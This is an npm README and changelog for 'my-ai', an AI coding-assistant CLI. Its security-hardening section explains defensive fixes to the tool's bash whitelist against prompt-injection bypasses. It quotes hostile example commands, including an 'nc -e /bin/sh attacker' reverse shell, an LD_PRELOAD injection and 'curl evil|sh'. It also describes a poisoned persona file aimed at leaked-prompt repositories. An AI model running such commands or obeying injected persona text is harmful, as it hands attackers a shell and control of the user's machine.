@gh3ttoniga/my-ai
v0.11.1
A free, local-first AI coding assistant CLI. Talks to Ollama by default and to Anthropic Claude when configured. Reads files, writes code, runs commands, and uses tools — like Claude Code in your terminal.
my-ai
A free, local-first AI coding assistant CLI. Talks to Ollama by default (any model you have running), and to Anthropic Claude when configured. Reads files, writes code, runs commands, and uses tools — like Claude Code in your terminal.
Default = Ollama = free. Nothing on your machine ever leaves your network. You can switch to Anthropic Claude (paid) any time by editing `.env`.
What you get out of the box
- Streaming chat UI with concurrent tool calls
- 22 tools: files (`read_file`, `write_file`, `edit_file`, `delete_file`, `move_file`), search (`Glob`, `Grep`, `tree`, `list_dir`), shell (`bash` + background `bash_async` / `bash_output` / `bash_kill`), web (`WebFetch`, `web_search`), dev (`git`, `run_tests`, `read_lints`, `notebook_edit`), agentic (`spawn_agent`, `TodoWrite`, `ask_user`), and self-extension (`add_mcp_server`)
- Multimodal: `@image.png` / `@doc.pdf` / any file becomes a vision/text/extracted part the model can read
- 31 slash commands, incl. `/undo`, `/map`, `/stats`, `/recall`, `/init`, `/review`, `/pr-comments`, `/rewind`, `/export`, `/memory`, `/context`, `/skill`, `/tree`, `/tree-conv`, `/mcp`
- Extensibility: custom slash commands + sub-agents (`.my-ai/commands|agents/*.md`), lifecycle hooks (`.my-ai/hooks.json`), skills (7 bundled, auto-activating), plugins (`.my-ai/plugins/`), and an MCP client with 15 curated presets (browser, git, fetch, db, search, memory, and media: ComfyUI/PiAPI video, ElevenLabs voice, Manim animation)
- Self-extension: when asked for something it can't do, my-ai researches a vetted tool (GitHub/npm) and wires it (`add_mcp_server`) instead of refusing
- Desktop app (`my-ai serve` web UI + Electron `.exe` shell), headless (`my-ai -p "task"` for CI/pipes), and an importable Agent SDK (`createAgent().run()`)
- Provider abstraction: local Ollama, Anthropic Claude (incl. `claude-fable-5` / `claude-opus-4-8`), or OpenRouter/MiniMax M3, via `.env`
- A layered safety model: bash whitelist, danger-tagged approval prompts, sandbox (`MY_AI_SANDBOX_ROOT`), user rules (`.my-ai/rules.json`), secret redaction, an audit log, and three permission profiles
- A Claude-Code-style chip surface for parallel tool batches: status pills, conflict warnings, per-batch timing, and a per-turn cost row (see What you'll see)
- 762 unit tests (pure-logic, no I/O; `npm test`) plus end-to-end smokes
- System prompt and tool-loop behavior inspired by Claude Code's publicly documented patterns; independently reimplemented here, not derived from upstream source
What's new in 0.11.0
The phase E1–E9 sweep toward full free-Claude-Code parity:
- Media generation (MCP presets): `comfyui` (local image/video/audio/3D), `piapi` (cloud video/music/3D), `elevenlabs` (TTS/STT/voice), `manim` (animation video). `/mcp add <name>`.
- Knowledge layer (skills): `.my-ai/skills/*.md` + 7 bundled (ui-ux, security, code-review, testing, performance, accessibility, api-design) that auto-activate on trigger keywords. `/skill`.
- Extensibility: custom commands + sub-agents from files, lifecycle hooks, plugins (bundles of the above).
- Background shells: `bash_async` / `bash_output` / `bash_kill` for dev servers, watchers, builds.
- Headless + SDK: `my-ai -p "task"` (clean stdout, CI-ready) and `createAgent().run()`.
- Seven built-in commands: `/init`, `/review`, `/pr-comments`, `/rewind`, `/export`, `/memory`, `/context`.
- Notebooks: `notebook_edit` for `.ipynb` cells. MCP resources: `/mcp resources` + `/mcp read`.
- Self-extension: the agent acquires missing capabilities (research → `add_mcp_server` → relaunch).
- Integrations: a GitHub Action headless runner (`.github/workflows/my-ai.yml`) and a VS Code extension scaffold (`vscode-extension/`).
What's new in 0.7.5
Five autonomy primitives wired into the existing CLI loop, all default-OFF (today's behavior is byte-identical without opt-in env). See also the Security hardening (0.7.5) section below for the three security fixes in this release, and the What you'll see section for the parallel-tool chip surface.
spawn_agent
Sub-agent delegation is now on the tool list (src/subagent.ts#SPAWN_AGENT_TOOL), with recursion bounded at 1. SUBAGENT_TOOLS strips spawn_agent from the child's tool surface AND runToolForSubAgent rejects spawn_agent by name as defense-in-depth so a future caller passing a wider tool set still cannot recursively spawn. The sub-agent's intermediate chat chatter never interleaves with the parent display (silent onText / onReasoning wrappers); only the final answer lands as the tool_result the parent model sees, plus a single dim ⹑ sub-agent: <N> turns, <M> tool(s) line on stderr. Activate: just ask the model to delegate a focused sub-task; no env var, no slash command.
budget
Per-task token/turn budget guard (src/budget.ts). Set MY_AI_MAX_TOKENS=N (positive int) and/or MY_AI_MAX_TURNS=N (positive int) in .env to cap a single agent loop. Either unset = unlimited; both unset = byte-identical to pre-0.7.5 behavior. When tripped the loop emits ⛔ stopped: <reason> and drops the user prompt without history corruption. Pin: tests/budget.test.ts verifies the byte-identical default-OFF behavior.
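The budget guard described above can be sketched as a pair of pure functions. This is a minimal illustration, not the code in `src/budget.ts`: the names `readBudget` and `checkBudget`, the reason strings, and the choice to treat malformed values as unset are all assumptions.

```typescript
// Hypothetical sketch; the real src/budget.ts may be shaped differently.
type BudgetEnv = Record<string, string | undefined>;

interface Budget {
  maxTokens: number | undefined; // undefined = unlimited
  maxTurns: number | undefined;  // undefined = unlimited
}

// Accept only positive integers; anything else counts as "unset" (assumption).
function parsePositiveInt(raw: string | undefined): number | undefined {
  if (raw === undefined || !/^\d+$/.test(raw.trim())) return undefined;
  const n = Number(raw.trim());
  return n > 0 ? n : undefined;
}

function readBudget(env: BudgetEnv): Budget {
  return {
    maxTokens: parsePositiveInt(env.MY_AI_MAX_TOKENS),
    maxTurns: parsePositiveInt(env.MY_AI_MAX_TURNS),
  };
}

// Returns a stop reason once a cap is reached, or null to keep looping.
function checkBudget(b: Budget, usedTokens: number, usedTurns: number): string | null {
  if (b.maxTurns !== undefined && usedTurns >= b.maxTurns) {
    return `turn budget reached (${usedTurns}/${b.maxTurns})`;
  }
  if (b.maxTokens !== undefined && usedTokens >= b.maxTokens) {
    return `token budget reached (${usedTokens}/${b.maxTokens})`;
  }
  return null;
}
```

With both variables unset, `checkBudget` always returns `null`, which mirrors the default-OFF behavior the text describes.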
retry
Self-correction retry policy (src/retry.ts). Set MY_AI_AUTO_RETRY=1 (accepts 1 / true / yes / on) to enable. The model re-plans a failed tool call once with a synthetic correction injected as a tool_result-style message; escalate routes the model toward ask_user after the cap. MY_AI_MAX_RETRIES=N (default DEFAULT_MAX_ATTEMPTS = 2 = 1 original + 1 retry) bounds repeat storms. Pin: tests/retry.test.ts 6 fixtures cover accept / retry / escalate.
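The accept / retry / escalate outcomes can be pictured as one small decision function. This is a sketch under assumptions: only `DEFAULT_MAX_ATTEMPTS = 2` comes from the text, while `decideRetry` and the 1-based `attempt` counter are hypothetical names, and how `MY_AI_MAX_RETRIES` maps onto the attempt cap is not shown here.

```typescript
type RetryDecision = "accept" | "retry" | "escalate";

// From the text: 1 original attempt + 1 retry.
const DEFAULT_MAX_ATTEMPTS = 2;

// attempt is 1-based: 1 = the original call, 2 = the first retry, and so on.
function decideRetry(
  ok: boolean,
  attempt: number,
  maxAttempts: number = DEFAULT_MAX_ATTEMPTS,
): RetryDecision {
  if (ok) return "accept";
  // Below the cap the model gets another try; at the cap it is routed to ask_user.
  return attempt < maxAttempts ? "retry" : "escalate";
}
```

Under the default cap, a failing call is retried once and then escalated, which is what bounds repeat storms.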
certifier
Tier 2.0 model-mode certifier upgrade (src/certify-model.ts#certifyWithModel). Set MY_AI_CERTIFY=model (or /certify model mid-session) so the active provider re-judges each tool result. The heuristic verdict is replaced on the model's pass / warn, preserved on unknown (fail-safe - a flaky model call cannot downgrade a confident pass). Per-tool upgrade writes an audit row to .my-ai/audit.log so the model's reasoning is visible. Pin: tests/certify-model.test.ts 4 fixtures verify the unknown-fail-safe.
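The fail-safe merge rule is small enough to show directly. The sketch below assumes the heuristic produces only `pass` or `warn`; the type names and `mergeVerdict` are illustrative and not taken from `src/certify-model.ts`.

```typescript
// Assumed verdict vocabularies; the real certifier may use more states.
type HeuristicVerdict = "pass" | "warn";
type ModelVerdict = "pass" | "warn" | "unknown";

// The model's pass/warn replaces the heuristic verdict;
// "unknown" keeps the heuristic verdict untouched (fail-safe).
function mergeVerdict(heuristic: HeuristicVerdict, model: ModelVerdict): HeuristicVerdict {
  return model === "unknown" ? heuristic : model;
}
```

A flaky model call that yields `unknown` therefore leaves a confident heuristic `pass` in place.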
sessions
Three new slash commands: /save [id] writes the in-memory messages[] to .my-ai/session-<safeId(id)>.json (default id "default"), /resume <id> splices it back over the in-memory messages, /sessions lists the saved set newest-updated first. Set MY_AI_AUTOSAVE=1 to autosave to a fixed session-autosave.json slot on every /exit AND SIGINT; default OFF preserves today's drop-on-exit semantics. Pin: tests/session.test.ts 5 fixtures cover round-trip + malformed input.
OpenRouter / MiniMax provider
The OpenAI-compatible dispatch in src/providers/ollama.ts already works against any OpenAI-compatible endpoint - set OPENAI_BASE_URL=https://openrouter.ai/api/v1 and OPENAI_API_KEY=<gateway-key>, leave PROVIDER=ollama. For MiniMax run a local proxy (e.g. llama.cpp --server) and point OPENAI_BASE_URL at it; the request/response shape already matches the OpenAI Chat Completions schema. No code changes; the path is documented and end-to-end-verified.
What's new in 0.8.0
The Tier 2.0 + autonomy night-run lands seven architectural commits (N1–N7) plus three smoke runners, two new modules, and 544 tests with 11 regression locks. The user-facing deltas:
- `certifyBatch` is now async: the per-tool model-mode upgrade loop lives inside `src/certify-batch.ts` instead of being dispatched inline in `src/cli.ts#agentTurn`. Set `MY_AI_CERTIFY=model` to upgrade each heuristic verdict via a single-shot `askOnce` to the active provider; `unknown` from the model is fail-safe (preserves the heuristic, never downgrades a confident pass). Use the `/certify model` slash command to switch mid-session.
- MCP servers wire from `.my-ai/mcp.json` at boot: define `{"image":{"command":"npx","args":["-y","@modelcontextprotocol/server-canvas"]}}` and the namespaced tools (`mcp__image__generate` etc.) register at startup. Per-server try/catch isolates failures; missing config silently no-ops. The CLI prints `🔌 mcp: <N> MCP server(s) · <K> native tool(s) registered` under the boot banner so you can see the result.
- `move_file` is a gated first-class tool: joins `bash` / `delete_file` / `read_lints` in the `[y/N]` gate under the `default` profile; refused under `readonly`. Works across devices (EXDEV copy-then-remove); creates destination parent dir.
- `/decompose <goal>` instant plan tree: one model call returns a numbered plan; `parsePlan` + `renderPlan` print `○` / `▶` / `✓` / `✗` glyphs. Re-issue bare to reprint the active plan, or with no plan in memory for a `(no plan in this session — /decompose <goal> first)` line.
- OpenRouter / MiniMax / DeepSeek reasoning shows in the thinkpad: provider-field reasoning (`delta.reasoning`, `reasoning_content`, `reasoning_details[]`) now flows through the `💭` stderr channel via `src/think-reasoning.ts#extractReasoning`. Inline-tag reasoning (Ollama, Anthropic with extended thinking) unchanged.
- `PROVIDER_PRESETS` for first-run UX: four curated entries (`openrouter` / `minimax` / `lm-studio` / `vllm`) come with the package; `formatPresetsList()` renders them for `/doctor --explain presets`. Hosted vs local are distinguished via `requiresApiKey`.
- `MY_AI_AUTOCOMMIT` opt-in auto-commit: after a `write_file` / `edit_file` under `--no-approve` / `MY_AI_AUTO_APPROVE` / paranoid-accepted, `src/autocommit.ts` runs `git add -A && git commit -m <tool: preview>`. Best-effort, never throws; routes through `child_process.execFile` (NEVER `shell:true`); sanitizes multi-line forges and caps the message at 200 chars.
- Three E2E smoke runners: `tools/certify-smoke.ts` (certifier modes), `tools/retry-smoke.ts` (accept/retry/escalate), `tools/session-smoke.ts` (`/save` roundtrip). All run the real CLI in tmpdir against `PROVIDER=mock` + `MY_AI_MOCK_SCRIPT`; no Ollama / network required.
- Pre-release gate + cut orchestrator: `tools/pre-tag-check.sh` (11 regression locks mirroring CI) and `scripts/release-cut.sh` (defaults dry-run; `--apply` performs the cut). Run `npm run pretag` then `npm run release-cut -- --apply`.
What's new in 0.8.1
A quality + test-coverage patch closing the post-v0.8.0 BUGLIST-pass2 audit. No user-facing surface change — every command, flag, env var, and slash command behaves identically to 0.8.0. The release is a refactor + documentation + test-completeness honest-bump: 544 unit tests now pass, up from 477 at v0.8.0.
- `src/cli.ts` table-driven dispatch + catalog dedup: the 14-arm `if/else-if` REPL slash-cascade collapses to a single `Map`-driven dispatch via the new `src/dispatch.ts` (`slashCommands` Map + 19-entry `DEFAULT_COMMAND_METADATA` catalog as the single source of truth for both dispatch and `printHelp`). Routing fix: `/save [id]` and `/resume <id>` are indexed as bare `/save` and `/resume` (since `parseSlash` splits on first whitespace), so a `/save abc` call routes correctly to the canonical cmd key. The new `registerAllSlashCommands` in `src/cli.ts` iterates the catalog and binds each entry to a `handlersByCmd` map of `SlashHandler` closures over module state; a missing handler throws at module-load, so wiring drift fails fast rather than silently stub-falling.
- Documentation completeness: `docs/COMMANDS.md` is now the canonical reference for all 19 commands (16 advertised + 3 hidden), with `cmd` / `intent` / `response shape` / `when to use` columns. Defensive-path test coverage on `src/session.ts`, `src/doctor.ts`, `src/redact.ts` (the M1+M2+M3 work).
- Test coverage closed: 12 new fixtures in `tests/certify-batch.test.ts` pin the public surface of `certifyBatch(calls, opts) ⇒ Promise<BatchCertification>` (heuristic + N7 model-mode upgrade pass + 3 fail-safe paths + multi-call ordering). This was the last `src/` file lacking unit-test coverage after H2 closed both providers. `tests/commands.test.ts` + `tests/persona.test.ts` close the L2 / L3 catalog-shape and `DEFAULT_PERSONA` uniqueness contracts with grep + structural-shape pins.
Try it: `npx @gh3ttoniga/[email protected]`. The Tier 1.4–1.9 chip layer, BUF-1–3 autonomy primitives, Tier 2 certifier, MCP wiring, and `move_file` gate behavior are unchanged from v0.8.0.
What's new in 0.7.4
- Parallel-write collision: when two writes target the same path, a `⚠ colliding writes at indices i,j` row warns you before they race.
- Auto-serialize opt-in: set `MY_AI_AUTO_SERIALIZE=1` to ship colliding writes in order; they apply sequentially with the last write winning.
- Per-turn cost row: a `💸 ~N in / ~N out · N tok` line after every turn; Anthropic reports exact, Ollama falls back to a `chars/4` estimate.
- Verbose uniformity: `--verbose` threads through every chip class: args, results, slowest tool, and an `↳ estimate (chars/4)` vs. `↳ model-reported` annotation.
- Wider bash whitelist: opt `pnpm`, `bun`, `deno`, `npx`, etc. into the auto-approved pattern via `MY_AI_SAFE_COMMANDS` (no fork needed).
- Broader error classification: timeouts and signal kills now register as errors, not as green-completed.
- System-prompt denylist: two known leaked-prompt aggregator repositories are blocked from sources this session.
- `/plan` audit replay: see historical Tier 1.4 batch-level decisions (approved / revised / rejected / auto-approved) from `.my-ai/audit.log`.
- `/tokens` slash command: per-role breakdown plus the active compaction budget and utilization percentage so you can see context-window pressure at a glance.
- Hardened CI gate: every push runs `typecheck + test + build + chip smoke` on Node 20 + 22; merges to `main` are blocked on any failure.
Try it: `npx @gh3ttoniga/[email protected]` (both install paths below).
Security hardening (0.7.5)
Three adversarial gates closed in this release. None change the visible UX for normal usage — they tighten what the per-command bash whitelist auto-approves and what a poisoned persona file can drop. See docs/security-audit-0.7.x.md for the full L×I risk register and red-team-fixtures.md for the 20-entry fixture battery driving these tests.
Persona override cannot drop the denylist
A custom persona file — MY_AI_PERSONA env var or .my-ai/persona.md — replaces only the ## Persona and tone section of DEFAULT_PERSONA. The list of forbidden system-prompt aggregators (the two public repos holding leaked Claude Code 2.0 and Cursor 2.0 production prompts) is hardcoded into src/prompts.ts#DENIED_PATHS_SECTION and spliced into every buildSystemPrompt() output, independent of persona resolution. End-user behavior: a malicious persona loaded via MY_AI_PERSONA=./evil.md cannot instruct the model to read those repos. The denylist survives because the splice happens after the persona slot in the system-prompt template, not as a merge inside resolvePersona. Tested at tests/prompts.test.ts with both the env-axis and cwd-file C-β pin (denylist present in assistant.message after every persona override).
Bash whitelist newline escape
isSafeReadOnlyBash now early-returns { safe: false } for any command containing \r or \n. Closes the indirect-injection vector where a multi-line bash call with a safe leading binary (ls, git status, etc.) and a hostile second line (\nnc -e /bin/sh attacker 4444) would have been auto-approved under the read-only whitelist. Locks down the multi-line shell substitution path that was the only remaining way past the leading-token-only check. Tested at tests/whitelist.test.ts#multi-line command is never auto-safe.
Bash whitelist wrapper-binary escape
When the leading token is a wrapper binary (env, nice, timeout, nohup, xargs, stdbuf), the safety check now resolves past it to the real command. Two exploit shapes that used to auto-pass and now don't:
- `env LD_PRELOAD=/tmp/evil.so cat x` was: `env` whitelisted + `cat` whitelist-OK in the second position + `=` not a metachar → auto-approved. No longer: `stripWrappers()` peels `env` down to `LD_PRELOAD=/tmp/evil.so cat x`, which fails the metachar check on `=` and `/`.
- `env X=1 bash -c 'curl evil|sh'` was: `env` whitelisted + `bash` whitelist-OK + `-c` not a destructive flag → auto-approved. No longer: recursion past `env` lands on `bash -c 'curl evil|sh'`, which fails the metachar check on `'`, `|`.
The wrapper resolution is bounded (max one level deep) so a chained env env env cmd can't loop forever. Tested at tests/whitelist.test.ts#wrapper binaries resolve to the real command + #stripWrappers: peels wrapper prefixes down to the real command.
These three fixes fine-tune the default profile's auto-approval surface; under readonly / paranoid, or with MY_AI_AUTO_APPROVE unset, the gate still prompts as before. They mostly matter when you're running with --no-approve and trusting the session. The decision line under each prompt and the audit log (.my-ai/audit.log) are unchanged — every gated call still gets logged regardless.
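The newline and wrapper-binary checks described above can be sketched together. This is an illustration only: the wrapper list comes from the text, but `SAFE_BINARIES`, the exact metachar set, and the function bodies are assumptions and will differ from the real whitelist code.

```typescript
// Wrapper binaries named in the text.
const WRAPPERS = new Set(["env", "nice", "timeout", "nohup", "xargs", "stdbuf"]);
// Hypothetical whitelist and metachar set, chosen to match the examples above.
const SAFE_BINARIES = new Set(["ls", "cat", "pwd", "git"]);
const METACHARS = /[;&|<>$'"=\/`]/;

// Peel at most one leading wrapper token (bounded, so `env env env cmd` cannot loop).
function stripWrappers(command: string): string {
  const [first = "", ...rest] = command.trim().split(/\s+/);
  if (rest.length > 0 && WRAPPERS.has(first)) return rest.join(" ");
  return command.trim();
}

function isSafeReadOnlyBash(command: string): { safe: boolean } {
  // Multi-line commands are never auto-safe.
  if (/[\r\n]/.test(command)) return { safe: false };
  const real = stripWrappers(command);
  // Any metacharacter in the resolved command forces a prompt.
  if (METACHARS.test(real)) return { safe: false };
  const [leading = ""] = real.split(/\s+/);
  return { safe: SAFE_BINARIES.has(leading) };
}
```

Both exploit shapes from the list fall through to `{ safe: false }` here, so they would reach the `[y/N]` prompt instead of being auto-approved.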
Setup — Ollama path (FREE, recommended)
1. Install Ollama
Download from https://ollama.com/download and run the installer. Or on macOS / Linux:
curl -fsSL https://ollama.com/install.sh | sh
2. Pull a model
Tool calling is required. qwen2.5-coder:7b is a strong default. Pick one that fits your hardware:
# Lightweight (4–6 GB, runs on most laptops including CPU):
ollama pull qwen2.5-coder:3b
# or: ollama pull llama3.2:3b
# Default (8–10 GB, best balance — needs NVIDIA GPU for fast inference):
ollama pull qwen2.5-coder:7b
# Stronger (~20 GB, requires beefy GPU):
ollama pull qwen2.5-coder:32b
# Strongest (high-end GPU only):
ollama pull llama3.1:70b
Run it once to confirm it works:
ollama run qwen2.5-coder:7b "Write a Python function to compute factorial"
3. Configure my-ai
cp .env.example .env
`.env` defaults to `PROVIDER=ollama`. Uncomment and edit the lines for the model you pulled.
4. Run
npm install
npm run dev # uses tsx, no compile step
You should see the my-ai banner, then a `you ›` prompt.
Setup — Anthropic path (paid, opt-in)
If you'd rather use Claude over the API (highest capability):
- Sign up at https://console.anthropic.com/ and create an API key.
- In `.env`, set:
  PROVIDER=anthropic
  ANTHROPIC_API_KEY=sk-ant-...
- Run `npm run dev`.
Setup — MiniMax media (MCP integration, opt-in)
my-ai supports the Model Context Protocol (MCP) to plug in external tools. To enable MiniMax image + video + TTS:
- `pip install uvx`
- Inside the `my-ai` REPL, run `/mcp add minimax`
- Edit `.my-ai/mcp.json` and fill your `MINIMAX_API_KEY` from the MiniMax platform dashboard. `MINIMAX_API_HOST` defaults to `https://api.minimax.io` (override only for self-hosted or regional shards).
- `/exit` and relaunch; MCP wiring runs at boot. Expect under the banner:
🔌 mcp: 1 MCP server(s) · 8 native tool(s) registered
mcp:minimax (8 tools)
Plus a `/mcp show` row `minimax` (green).
Namespacing: two MCP servers can both expose generate_image; the CLI
distinguishes them by server prefix (mcp__minimax__generate_image vs.
mcp__flux__generate_image). Every mcp__* call goes through the standard
[y/N] gate on every profile. Bypass with MY_AI_AUTO_APPROVE=1. See
docs/mcp-media.md for the full setup steps
(uvx install + API key + host override + troubleshooting + tool table).
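The `mcp__<server>__<tool>` naming scheme can be sketched as a build/parse pair. The helper names below are hypothetical, and the parser assumes server names never contain a double underscore.

```typescript
// Build the namespaced tool name the CLI registers for an MCP tool.
function namespacedToolName(server: string, tool: string): string {
  return `mcp__${server}__${tool}`;
}

// Split a namespaced name back into its parts; returns null for native tools.
// Assumption: server names contain no "__".
function parseNamespacedTool(name: string): { server: string; tool: string } | null {
  const parts = name.split("__");
  if (parts.length < 3 || parts[0] !== "mcp") return null;
  const server = parts[1] ?? "";
  const tool = parts.slice(2).join("__");
  if (server === "" || tool === "") return null;
  return { server, tool };
}
```

Two servers exposing the same tool name map to distinct keys, so neither registration overwrites the other.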
Usage
First-time
npm install
cp .env.example .env
# edit .env to choose PROVIDER + model
npm run dev # fastest iteration
# or
npm run build && npm start # production run
Install & run
End users on any machine can run the published CLI without cloning — pick one:
# Reproducible — pins to the tested 0.7.4 release line:
npx @gh3ttoniga/[email protected]
# Track-the-latest global install — update with `npm i -g` again to bump:
npm i -g @gh3ttoniga/my-ai
The exec name is `my-ai` (mapped by `package.json#bin` to `dist/cli.js`). If you cloned the repo, the launcher in `bin/run.sh` (POSIX) / `bin/run.ps1` (Windows) resolves the project root and prefers the compiled `dist/cli.js` so clone-developers get the same `my-ai` CLI surface:
npm install
npm run build
./bin/run.sh # POSIX
./bin/run.ps1 # Windows
Web UI (my-ai serve)
A small HTTP server that drives the SAME agent loop the REPL uses — same provider dispatcher, same toolHandlers, same message envelope. Useful when you'd rather use a browser than the terminal, or when you'd like to expose the agent on a dashboard / piped through another service.
# Boot the web UI on the default port (8787, bound to 127.0.0.1)
my-ai serve
# Custom port + uploads directory
my-ai serve --port 3000 --uploads ./shared-uploads
# OS-assigned ephemeral port (handy in tests / multi-service dashboards)
my-ai serve --port 0
# LAN-share an existing model config without auto-launching a browser
my-ai serve --host 0.0.0.0 --no-open
The UI runs at `http://127.0.0.1:<port>/` (the default browser opens on boot, best-effort and never throwing; `--no-open` skips the spawn). It exposes a chat transcript with bubble-style messages (user / assistant / reasoning / uploaded-file pills), live SSE streaming (`event: chunk` per model delta + `event: done` with the final assistant text + `event: error` if the engine throws), an Upload button that POSTs to `/api/upload` (saved under `./uploads` by default), and a `GET /api/files` list endpoint for the round-trip smoke. Routes:
- `GET /`: static UI shell (no build pipeline; `ui/index.html`).
- `GET /health`: `{"ok": true, "host": "<addr>", "port": <n>}` liveness probe (used by the UI's status badge + any external `/doctor`-style curl smoke).
- `GET /api/files`: `{"files": ["<name>", ...]}` list of uploaded filenames (sorted, dotfiles filtered).
- `GET /api/files/<name>`: downloads with the right Content-Type via `safeFilename` (404 if missing).
- `POST /api/upload?name=<fn>`: raw body becomes the file under `./uploads/`; returns `{"file": "<safe>", "bytes": <N>}`. Filenames are sanitized via `safeFilename`: separators stripped, leading dots stripped, illegal chars (`:*?"<>|`) replaced, length clamped to 200, `"file"` fallback for empty.
- `POST /api/chat`: Server-Sent Events stream of one agent turn; send `{message, files?}` (single message + optional file basename list; the server is stateless and the UI maintains history locally), receive `event: chunk` per `onChunk` call + `event: done` with the engine's return value + `event: error` if the engine throws.
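The filename rules listed for the upload route can be sketched as a single chain of replacements. This is not the project's `safeFilename`: the function name `safeFilenameSketch`, the `_` replacement character, and the order of the steps are assumptions.

```typescript
// Hypothetical re-creation of the sanitizing rules described for uploads.
function safeFilenameSketch(name: string): string {
  const cleaned = name
    .replace(/[\/\\]/g, "")       // strip path separators
    .replace(/^\.+/, "")          // strip leading dots
    .replace(/[:*?"<>|]/g, "_")   // replace illegal chars ("_" is an assumption)
    .slice(0, 200);               // clamp length to 200
  return cleaned.length > 0 ? cleaned : "file"; // fallback for empty names
}
```

Stripping separators before leading dots means a traversal attempt such as `../../etc/passwd` collapses to a plain basename that stays inside the uploads directory.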
The chat surface reuses the same client.chat() call the REPL uses via src/agent-engine.ts — a single-message async function adapter ((message, onChunk, files) => Promise<string>) that wraps the existing provider call. REUSE-DON'T-FORK: same provider dispatcher, same persona + denylist + project block, same {role, content} message envelope the REPL uses; no second agent path. Power features (Tier 1.4 plan gate + certifier + budget/cost cap + profile/danger/prompt gate + Tier-1.6 chip layer + slash commands) stay terminal-only — they're an interactive UX and don't translate to a streaming HTTP consumer. A future tier could lift a sub-set into a request-level policy, but the wire today is "send your message + files, get streamed text back".
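A consumer of `POST /api/chat` needs to split the stream into events. The sketch below parses standard Server-Sent Events framing (`event:` / `data:` lines separated by a blank line); it assumes each `data:` payload is plain text, which the server may or may not do, and `parseSseFrames` is a hypothetical helper rather than part of the package.

```typescript
interface SseEvent {
  event: string;
  data: string;
}

// Parse a buffered SSE body into events. Frames are separated by a blank line.
function parseSseFrames(raw: string): SseEvent[] {
  const events: SseEvent[] = [];
  for (const frame of raw.split(/\r?\n\r?\n/)) {
    let event = "message"; // SSE default when no event: line is present
    const data: string[] = [];
    for (const line of frame.split(/\r?\n/)) {
      if (line.startsWith("event:")) event = line.slice(6).trim();
      else if (line.startsWith("data:")) data.push(line.slice(5).replace(/^ /, ""));
    }
    // Frames without data (including the trailing empty frame) are skipped.
    if (data.length > 0) events.push({ event, data: data.join("\n") });
  }
  return events;
}
```

A client would append each `chunk` payload to the visible bubble and treat `done` or `error` as the end of the turn.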
In-chat commands
- `/help` - list available commands
- `/clear` - reset the conversation history
- `/todos` - ask the model to print the current todo list
- `/doctor` - diagnose provider + model setup (free-engine friendly)
- `/doctor --explain <check>` - root cause + one-line fix for a failing check (`server`, `model`, `key`, `tools`)
- `/model [name]` - show or switch the active provider at runtime (`ollama`, `anthropic`)
- `/profile [name]` - show or switch the permission profile (`default`, `readonly`, `paranoid`); persists to `.my-airc`
- `/compact` - force-summarize older turns now to free up context
- `/tokens` - show estimated-token breakdown of the current conversation (per role + total) plus the active compaction budget and utilization percentage, so you can see how full the context is without leaving the chat. Reads `MY_AI_COMPACTION_BUDGET` (same var as the compactor); malformed input falls back to the 8000-token default silently so a bad env var can never break the inspection.
- `/persona` - show the active voice / push-back / style-defaults persona caption (resolved at boot from `MY_AI_PERSONA` file path or `.my-ai/persona.md`)
- `/persona reload` - prints a note that the caption is captured at boot; reloading mid-session is a no-op (exit + re-launch to pick up an edited persona file)
- `/persona reset` - show how to return to the built-in default persona (clear `.my-ai/persona.md` / unset `MY_AI_PERSONA`, then re-launch)
- `/plan` - replay the Tier 1.4 batch-level plan-gate decisions recorded in `.my-ai/audit.log` (filters the `plan-*` audit lines: approved / revised / rejected / auto-approved). The gate's pure-logic decision (`evalPlanGate` / `estimateBatchLineDelta` / `renderPlanCard`) lives in `src/plan.ts` (~180 lines, no I/O); end-to-end exercised by `tools/tier1.4-smoke.ts`.
- `/tree [path]` - print a compact directory tree rooted at `path` (defaults to cwd). Skips `node_modules`, `.git`, build/CI caches, and dotfiles by default; capped at depth 3 + 200 entries; unreadable dirs are silently skipped. Delegates to `src/explore.ts#fsTree` (also powers the `tree` model tool the parent + read-only sub-agents can call). Same `↳` / truncation rules as the width-time `tools/tier1.6-chip-smoke.ts` family of fixtures.
- `/tree-conv` - show this session's conversation as a git-style tree. The REPL persists each message as a JSON node under `.my-ai/conversation/<id>/` (one file per message, each linking to its parent); `/tree-conv` reads them back and prints an indented outline with role glyphs and a `branch point(s)` footer (a node gains a second child when you rewind with `/undo` and continue). Best-effort: a write failure prints a dim warning and never breaks the turn. Delegates to `src/conversation-tree.ts`.
- `/mcp` - list curated MCP presets; `/mcp add <preset>` wires one into `.my-ai/mcp.json`; `/mcp show` lists connected servers; `/mcp resources` / `/mcp read <server> <uri>` browse a server's resources
- `/skill [name]` - list skills (`.my-ai/skills/*.md` + bundled), or activate one into the system prompt; skills also auto-activate on trigger keywords
- `/undo` - restore the most recent file change (the last `write` / `edit` / `delete` / `move`)
- `/map [path]` - print a compact exported-symbol map of source files (default `src`)
- `/stats` - per-session tool-usage table (calls, errors, total ms)
- `/recall <query>` - search saved sessions (`.my-ai/session-*.json`) for text
- `/init` - scan the repo and write a `CLAUDE.md` project-memory file
- `/review [staged]` - have the model review the current `git diff` (add `staged` for the index)
- `/pr-comments [n]` - list review comments on a PR via the `gh` CLI
- `/rewind [n]` - drop the last `n` exchanges from the conversation (default 1)
- `/export` - export the conversation to a markdown file under `.my-ai/`
- `/memory <fact>` - append a fact to `.my-ai/instructions.md` and apply it this session
- `/context` - estimated token-window usage by role (system / user / assistant / tool)
- `/save [id]`, `/resume <id>`, `/sessions`, `/decompose <goal>` - session + planning helpers
- `/exit` - quit (also: `/quit` or Ctrl+C)
What you'll see — the chip surface
When the model calls tools, each parallel batch renders as a bracketed cluster of status "chips" on stderr (the visible answer stays clean on stdout):
⚡ 3 tools in parallel
○ read_file({"path":"src/a.ts"})
○ bash({"command":"ls"})
○ write_file({"path":"src/a.ts", ...})
● read_file src/a.ts · 42 lines
● bash $ ls · 7 lines
● write_file src/a.ts · CREATE (+12 lines)
⚠ src/a.ts · colliding writes at indices 0,2
⚡ 3 tools · 1.2s
- Pending pills (`○`, cyan) print once per tool before dispatch: one aggregate `⚡ N tool(s) in parallel` header, then a pill per call (Tier 1.6).
- Completed pills tint by outcome: `●` green ok, `✖` red error (any `Error…` result or a non-`Exit: 0` bash wrap, incl. timeouts/signal kills), `⊘` yellow blocked (a `readonly`-profile refusal). Each carries a one-line hint (`<path> · CREATE (+N lines)`, `±N lines`, `$ <cmd> · N lines`, …) (Tier 1.6).
